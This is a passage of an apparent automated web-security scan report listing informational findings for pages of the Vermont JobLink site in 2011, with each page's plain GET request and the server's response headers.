<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.56. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.57. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.58. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/style/cfmstyle.css

Request

GET /ada/global/style/cfmstyle.css HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:12:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT
Content-Type: text/css

We're sorry, but a fatal error has occurred (no client variables).

26.59. https://www.vermontjoblink.com/ada/leavesite.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Request

GET /ada/leavesite.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.60. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.61. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.62. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.63. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.64. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.65. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.66. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
